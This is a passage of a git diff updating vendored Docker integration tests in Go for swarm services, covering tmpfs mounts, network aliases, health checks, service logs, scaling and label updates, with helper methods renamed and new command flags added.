+ + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) } func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--mount", "type=tmpfs,target=/foo,tmpfs-size=1MB", "busybox", "sh", "-c", "mount | grep foo; tail -f /dev/null") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return len(tasks) > 0, nil }, checker.Equals, true) task := tasks[0] waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { - task = d.getTask(c, task.ID) + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) } - return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil }, checker.Equals, true) // check container mount config @@ -173,3 +410,38 @@ func (s *DockerSwarmSuite) TestServiceCreateMountTmpfs(c *check.C) { c.Assert(strings.TrimSpace(out), checker.HasPrefix, "tmpfs on /foo type tmpfs") c.Assert(strings.TrimSpace(out), checker.Contains, "size=1024k") } + +func (s *DockerSwarmSuite) TestServiceCreateWithNetworkAlias(c *check.C) { + d := s.AddDaemon(c, true, true) + out, err := d.Cmd("network", "create", "--scope=swarm", "test_swarm_br") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "create", "--no-resolve-image", "--detach=true", 
"--network=name=test_swarm_br,alias=srv_alias", "--name=alias_tst_container", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + id := strings.TrimSpace(out) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, id) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + // check container alias config + out, err = s.nodeCmd(c, task.NodeID, "inspect", "--format", "{{json .NetworkSettings.Networks.test_swarm_br.Aliases}}", task.Status.ContainerStatus.ContainerID) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + // Make sure the only alias seen is the container-id + var aliases []string + c.Assert(json.Unmarshal([]byte(out), &aliases), checker.IsNil) + c.Assert(aliases, checker.HasLen, 1) + + c.Assert(task.Status.ContainerStatus.ContainerID, checker.Contains, aliases[0]) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go index 30580f6be3..ae9e7868bb 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go @@ -8,8 +8,11 @@ import ( "github.com/docker/docker/api/types/swarm" "github.com/docker/docker/daemon/cluster/executor/container" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli" + "github.com/docker/docker/integration-cli/cli/build" 
"github.com/go-check/check" + "gotest.tools/icmd" ) // start a service, and then make its task unhealthy during running @@ -20,24 +23,23 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { d := s.AddDaemon(c, true, true) // build image with health-check - // note: use `daemon.buildImageWithOut` to build, do not use `buildImage` to build imageName := "testhealth" - _, _, err := d.buildImageWithOut(imageName, - `FROM busybox + result := cli.BuildCmd(c, imageName, cli.Daemon(d), + build.WithDockerfile(`FROM busybox RUN touch /status HEALTHCHECK --interval=1s --timeout=1s --retries=1\ - CMD cat /status`, - true) - c.Check(err, check.IsNil) + CMD cat /status`), + ) + result.Assert(c, icmd.Success) serviceName := "healthServiceRun" - out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--name", serviceName, imageName, "top") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return tasks, nil }, checker.HasLen, 1) @@ -45,7 +47,7 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { // wait for task to start waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateRunning) containerID := task.Status.ContainerStatus.ContainerID @@ -66,7 +68,7 @@ func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) { // Task should be terminated waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, 
swarm.TaskStateFailed) @@ -84,21 +86,21 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { // service started from this image won't pass health check imageName := "testhealth" - _, _, err := d.buildImageWithOut(imageName, - `FROM busybox + result := cli.BuildCmd(c, imageName, cli.Daemon(d), + build.WithDockerfile(`FROM busybox HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ - CMD cat /status`, - true) - c.Check(err, check.IsNil) + CMD cat /status`), + ) + result.Assert(c, icmd.Success) serviceName := "healthServiceStart" - out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--name", serviceName, imageName, "top") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return tasks, nil }, checker.HasLen, 1) @@ -106,7 +108,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { // wait for task to start waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateStarting) @@ -120,7 +122,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { }, checker.GreaterThan, 0) // task should be blocked at starting status - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) // make it healthy @@ -128,64 +130,7 @@ func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) { // Task should be at running status waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) - return 
task.Status.State, nil - }, checker.Equals, swarm.TaskStateRunning) -} - -// start a service whose task is unhealthy at beginning -// its tasks should be blocked in starting stage, until health check is passed -func (s *DockerSwarmSuite) TestServiceHealthUpdate(c *check.C) { - testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows - - d := s.AddDaemon(c, true, true) - - // service started from this image won't pass health check - imageName := "testhealth" - _, _, err := d.buildImageWithOut(imageName, - `FROM busybox - HEALTHCHECK --interval=1s --timeout=1s --retries=1024\ - CMD cat /status`, - true) - c.Check(err, check.IsNil) - - serviceName := "healthServiceStart" - out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top") - c.Assert(err, checker.IsNil, check.Commentf(out)) - id := strings.TrimSpace(out) - - var tasks []swarm.Task - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) - return tasks, nil - }, checker.HasLen, 1) - - task := tasks[0] - - // wait for task to start - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) - return task.Status.State, nil - }, checker.Equals, swarm.TaskStateStarting) - - containerID := task.Status.ContainerStatus.ContainerID - - // wait for health check to work - waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID) - failingStreak, _ := strconv.Atoi(strings.TrimSpace(out)) - return failingStreak, nil - }, checker.GreaterThan, 0) - - // task should be blocked at starting status - task = d.getTask(c, task.ID) - c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting) - - // make it healthy - d.Cmd("exec", containerID, "touch", "/status") - // Task should be at running status - 
waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - task = d.getTask(c, task.ID) + task = d.GetTask(c, task.ID) return task.Status.State, nil }, checker.Equals, swarm.TaskStateRunning) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go deleted file mode 100644 index c2216543d7..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go +++ /dev/null @@ -1,96 +0,0 @@ -// +build !windows - -package main - -import ( - "bufio" - "fmt" - "io" - "os/exec" - "strings" - - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -type logMessage struct { - err error - data []byte -} - -func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) { - testRequires(c, ExperimentalDaemon) - - d := s.AddDaemon(c, true, true) - - // we have multiple services here for detecting the goroutine issue #28915 - services := map[string]string{ - "TestServiceLogs1": "hello1", - "TestServiceLogs2": "hello2", - } - - for name, message := range services { - out, err := d.Cmd("service", "create", "--name", name, "busybox", - "sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message)) - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - } - - // make sure task has been deployed. 
- waitAndAssert(c, defaultReconciliationTimeout, - d.checkActiveContainerCount, checker.Equals, len(services)) - - for name, message := range services { - out, err := d.Cmd("service", "logs", name) - c.Assert(err, checker.IsNil) - c.Logf("log for %q: %q", name, out) - c.Assert(out, checker.Contains, message) - } -} - -func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) { - testRequires(c, ExperimentalDaemon) - - d := s.AddDaemon(c, true, true) - - name := "TestServiceLogsFollow" - - out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done") - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") - - // make sure task has been deployed. - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) - - args := []string{"service", "logs", "-f", name} - cmd := exec.Command(dockerBinary, d.prependHostArg(args)...) - r, w := io.Pipe() - cmd.Stdout = w - cmd.Stderr = w - c.Assert(cmd.Start(), checker.IsNil) - - // Make sure pipe is written to - ch := make(chan *logMessage) - done := make(chan struct{}) - go func() { - reader := bufio.NewReader(r) - for { - msg := &logMessage{} - msg.data, _, msg.err = reader.ReadLine() - select { - case ch <- msg: - case <-done: - return - } - } - }() - - for i := 0; i < 3; i++ { - msg := <-ch - c.Assert(msg.err, checker.IsNil) - c.Assert(string(msg.data), checker.Contains, "log test") - } - close(done) - - c.Assert(cmd.Process.Kill(), checker.IsNil) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go new file mode 100644 index 0000000000..ba337491b1 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_test.go @@ -0,0 +1,388 @@ +// +build !windows + +package main + +import ( + "bufio" + "fmt" + "io" + "os/exec" + "strings" + 
"time" + + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + "github.com/go-check/check" + "gotest.tools/icmd" +) + +type logMessage struct { + err error + data []byte +} + +func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) { + d := s.AddDaemon(c, true, true) + + // we have multiple services here for detecting the goroutine issue #28915 + services := map[string]string{ + "TestServiceLogs1": "hello1", + "TestServiceLogs2": "hello2", + } + + for name, message := range services { + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", + "sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message)) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + } + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, + d.CheckRunningTaskImages, checker.DeepEquals, + map[string]int{"busybox:latest": len(services)}) + + for name, message := range services { + out, err := d.Cmd("service", "logs", name) + c.Assert(err, checker.IsNil) + c.Logf("log for %q: %q", name, out) + c.Assert(out, checker.Contains, message) + } +} + +// countLogLines returns a closure that can be used with waitAndAssert to +// verify that a minimum number of expected container log messages have been +// output. +func countLogLines(d *daemon.Daemon, name string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + result := icmd.RunCmd(d.Command("service", "logs", "-t", "--raw", name)) + result.Assert(c, icmd.Expected{}) + // if this returns an emptystring, trying to split it later will return + // an array containing emptystring. a valid log line will NEVER be + // emptystring because we ask for the timestamp. 
+ if result.Stdout() == "" { + return 0, check.Commentf("Empty stdout") + } + lines := strings.Split(strings.TrimSpace(result.Stdout()), "\n") + return len(lines), check.Commentf("output, %q", string(result.Stdout())) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsCompleteness(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsCompleteness" + + // make a service that prints 6 lines + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for line in $(seq 0 5); do echo log test $line; done; sleep 100000") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6) + + out, err = d.Cmd("service", "logs", name) + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.TrimSpace(out), "\n") + + // i have heard anecdotal reports that logs may come back from the engine + // mis-ordered. if this tests fails, consider the possibility that that + // might be occurring + for i, line := range lines { + c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i)) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsTail(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsTail" + + // make a service that prints 6 lines + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for line in $(seq 1 6); do echo log test $line; done; sleep 100000") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6) + + out, err = d.Cmd("service", "logs", "--tail=2", name) + c.Assert(err, checker.IsNil) + lines := strings.Split(strings.TrimSpace(out), "\n") + + for i, line := range lines { + // doing i+5 is hacky but not too fragile, it's good enough. if it flakes something else is wrong + c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i+5)) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsSince(c *check.C) { + // See DockerSuite.TestLogsSince, which is where this comes from + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsSince" + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "for i in $(seq 1 3); do sleep .1; echo log$i; done; sleep 10000000") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // wait a sec for the logs to come in + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 3) + + out, err = d.Cmd("service", "logs", "-t", name) + c.Assert(err, checker.IsNil) + + log2Line := strings.Split(strings.Split(out, "\n")[1], " ") + t, err := time.Parse(time.RFC3339Nano, log2Line[0]) // timestamp log2 is written + c.Assert(err, checker.IsNil) + u := t.Add(50 * time.Millisecond) // add .05s so log1 & log2 don't show up + since := u.Format(time.RFC3339Nano) + + out, err = d.Cmd("service", "logs", "-t", fmt.Sprintf("--since=%v", since), name) + c.Assert(err, checker.IsNil) + + unexpected := []string{"log1", "log2"} + expected := []string{"log3"} + for _, v := range unexpected { + c.Assert(out, checker.Not(checker.Contains), v, check.Commentf("unexpected log message returned, since=%v", u)) + } + for _, v := range 
expected { + c.Assert(out, checker.Contains, v, check.Commentf("expected log message %v, was not present, since=%v", u)) + } +} + +func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsFollow" + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done") + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + + args := []string{"service", "logs", "-f", name} + cmd := exec.Command(dockerBinary, d.PrependHostArg(args)...) + r, w := io.Pipe() + cmd.Stdout = w + cmd.Stderr = w + c.Assert(cmd.Start(), checker.IsNil) + go cmd.Wait() + + // Make sure pipe is written to + ch := make(chan *logMessage) + done := make(chan struct{}) + go func() { + reader := bufio.NewReader(r) + for { + msg := &logMessage{} + msg.data, _, msg.err = reader.ReadLine() + select { + case ch <- msg: + case <-done: + return + } + } + }() + + for i := 0; i < 3; i++ { + msg := <-ch + c.Assert(msg.err, checker.IsNil) + c.Assert(string(msg.data), checker.Contains, "log test") + } + close(done) + + c.Assert(cmd.Process.Kill(), checker.IsNil) +} + +func (s *DockerSwarmSuite) TestServiceLogsTaskLogs(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServicelogsTaskLogs" + replicas := 2 + + result := icmd.RunCmd(d.Command( + // create a service with the name + "service", "create", "--detach", "--no-resolve-image", "--name", name, + // which has some number of replicas + fmt.Sprintf("--replicas=%v", replicas), + // which has this the task id as an environment variable templated in + "--env", "TASK={{.Task.ID}}", + // and runs this command to print exactly 6 logs lines + "busybox", "sh", "-c", "for line in $(seq 0 5); do echo $TASK log test 
$line; done; sleep 100000", + )) + result.Assert(c, icmd.Expected{}) + // ^^ verify that we get no error + // then verify that we have an id in stdout + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + // so, right here, we're basically inspecting by id and returning only + // the ID. if they don't match, the service doesn't exist. + result = icmd.RunCmd(d.Command("service", "inspect", "--format=\"{{.ID}}\"", id)) + result.Assert(c, icmd.Expected{Out: id}) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, replicas) + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 6*replicas) + + // get the task ids + result = icmd.RunCmd(d.Command("service", "ps", "-q", name)) + result.Assert(c, icmd.Expected{}) + // make sure we have two tasks + taskIDs := strings.Split(strings.TrimSpace(result.Stdout()), "\n") + c.Assert(taskIDs, checker.HasLen, replicas) + + for _, taskID := range taskIDs { + c.Logf("checking task %v", taskID) + result := icmd.RunCmd(d.Command("service", "logs", taskID)) + result.Assert(c, icmd.Expected{}) + lines := strings.Split(strings.TrimSpace(result.Stdout()), "\n") + + c.Logf("checking messages for %v", taskID) + for i, line := range lines { + // make sure the message is in order + c.Assert(line, checker.Contains, fmt.Sprintf("log test %v", i)) + // make sure it contains the task id + c.Assert(line, checker.Contains, taskID) + } + } +} + +func (s *DockerSwarmSuite) TestServiceLogsTTY(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsTTY" + + result := icmd.RunCmd(d.Command( + // create a service + "service", "create", "--detach", "--no-resolve-image", + // name it $name + "--name", name, + // use a TTY + "-t", + // busybox image, shell string + "busybox", "sh", "-c", + // echo to stdout and stderr + "echo out; (echo err 1>&2); sleep 10000", + )) + + result.Assert(c, 
icmd.Expected{}) + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + // so, right here, we're basically inspecting by id and returning only + // the ID. if they don't match, the service doesn't exist. + result = icmd.RunCmd(d.Command("service", "inspect", "--format=\"{{.ID}}\"", id)) + result.Assert(c, icmd.Expected{Out: id}) + + // make sure task has been deployed. + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 2) + + cmd := d.Command("service", "logs", "--raw", name) + result = icmd.RunCmd(cmd) + // for some reason there is carriage return in the output. i think this is + // just expected. + result.Assert(c, icmd.Expected{Out: "out\r\nerr\r\n"}) +} + +func (s *DockerSwarmSuite) TestServiceLogsNoHangDeletedContainer(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsNoHangDeletedContainer" + + result := icmd.RunCmd(d.Command( + // create a service + "service", "create", "--detach", "--no-resolve-image", + // name it $name + "--name", name, + // busybox image, shell string + "busybox", "sh", "-c", + // echo to stdout and stderr + "while true; do echo line; sleep 2; done", + )) + + // confirm that the command succeeded + result.Assert(c, icmd.Expected{}) + // get the service id + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + + // make sure task has been deployed. 
+ waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 2) + + // now find and nuke the container + result = icmd.RunCmd(d.Command("ps", "-q")) + containerID := strings.TrimSpace(result.Stdout()) + c.Assert(containerID, checker.Not(checker.Equals), "") + result = icmd.RunCmd(d.Command("stop", containerID)) + result.Assert(c, icmd.Expected{Out: containerID}) + result = icmd.RunCmd(d.Command("rm", containerID)) + result.Assert(c, icmd.Expected{Out: containerID}) + + // run logs. use tail 2 to make sure we don't try to get a bunch of logs + // somehow and slow down execution time + cmd := d.Command("service", "logs", "--tail", "2", id) + // start the command and then wait for it to finish with a 3 second timeout + result = icmd.StartCmd(cmd) + result = icmd.WaitOnCmd(3*time.Second, result) + + // then, assert that the result matches expected. 
if the command timed out, + // if the command is timed out, result.Timeout will be true, but the + // Expected defaults to false + result.Assert(c, icmd.Expected{}) +} + +func (s *DockerSwarmSuite) TestServiceLogsDetails(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "TestServiceLogsDetails" + + result := icmd.RunCmd(d.Command( + // create a service + "service", "create", "--detach", "--no-resolve-image", + // name it $name + "--name", name, + // add an environment variable + "--env", "asdf=test1", + // add a log driver (without explicitly setting a driver, log-opt doesn't work) + "--log-driver", "json-file", + // add a log option to print the environment variable + "--log-opt", "env=asdf", + // busybox image, shell string + "busybox", "sh", "-c", + // make a log line + "echo LogLine; while true; do sleep 1; done;", + )) + + result.Assert(c, icmd.Expected{}) + id := strings.TrimSpace(result.Stdout()) + c.Assert(id, checker.Not(checker.Equals), "") + + // make sure task has been deployed + waitAndAssert(c, defaultReconciliationTimeout, d.CheckActiveContainerCount, checker.Equals, 1) + // and make sure we have all the log lines + waitAndAssert(c, defaultReconciliationTimeout, countLogLines(d, name), checker.Equals, 1) + + // First, test without pretty printing + // call service logs with details. set raw to skip pretty printing + result = icmd.RunCmd(d.Command("service", "logs", "--raw", "--details", name)) + // in this case, we should get details and we should get log message, but + // there will also be context as details (which will fall after the detail + // we inserted in alphabetical order + result.Assert(c, icmd.Expected{Out: "asdf=test1"}) + result.Assert(c, icmd.Expected{Out: "LogLine"}) + + // call service logs with details. this time, don't pass raw + result = icmd.RunCmd(d.Command("service", "logs", "--details", id)) + // in this case, we should get details space logmessage as well. 
the context + // is part of the pretty part of the logline + result.Assert(c, icmd.Expected{Out: "asdf=test1 LogLine"}) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go index 29cca2358d..41b49d64aa 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go @@ -6,7 +6,7 @@ import ( "fmt" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -14,11 +14,11 @@ func (s *DockerSwarmSuite) TestServiceScale(c *check.C) { d := s.AddDaemon(c, true, true) service1Name := "TestService1" - service1Args := append([]string{"service", "create", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...) + service1Args := append([]string{"service", "create", "--detach", "--no-resolve-image", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...) // global mode service2Name := "TestService2" - service2Args := append([]string{"service", "create", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...) + service2Args := append([]string{"service", "create", "--detach", "--no-resolve-image", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...) // Create services out, err := d.Cmd(service1Args...) 
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go index 837370ceeb..a281327afe 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go @@ -7,82 +7,47 @@ import ( "fmt" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -func (s *DockerSwarmSuite) TestServiceUpdatePort(c *check.C) { - d := s.AddDaemon(c, true, true) - - serviceName := "TestServiceUpdatePort" - serviceArgs := append([]string{"service", "create", "--name", serviceName, "-p", "8080:8081", defaultSleepImage}, sleepCommandForDaemonPlatform()...) - - // Create a service with a port mapping of 8080:8081. - out, err := d.Cmd(serviceArgs...) - c.Assert(err, checker.IsNil) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1) - - // Update the service: changed the port mapping from 8080:8081 to 8082:8083. 
- _, err = d.Cmd("service", "update", "--publish-add", "8082:8083", "--publish-rm", "8081", serviceName) - c.Assert(err, checker.IsNil) - - // Inspect the service and verify port mapping - expected := []swarm.PortConfig{ - { - Protocol: "tcp", - PublishedPort: 8082, - TargetPort: 8083, - PublishMode: "ingress", - }, - } - - out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.EndpointSpec.Ports }}", serviceName) - c.Assert(err, checker.IsNil) - - var portConfig []swarm.PortConfig - if err := json.Unmarshal([]byte(out), &portConfig); err != nil { - c.Fatalf("invalid JSON in inspect result: %v (%s)", err, out) - } - c.Assert(portConfig, checker.DeepEquals, expected) -} - func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--name=test", "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name=test", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) - service := d.getService(c, "test") + service := d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 0) // add label to empty set - out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo=bar") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 1) c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar") // add label to non-empty set - out, err = d.Cmd("service", "update", "test", "--label-add", "foo2=bar") + out, err = d.Cmd("service", "update", "--detach", "test", "--label-add", "foo2=bar") c.Assert(err, checker.IsNil, check.Commentf(out)) - service = d.getService(c, "test") + service = d.GetService(c, "test") c.Assert(service.Spec.Labels, checker.HasLen, 2) c.Assert(service.Spec.Labels["foo2"], checker.Equals, "bar") - out, err = 
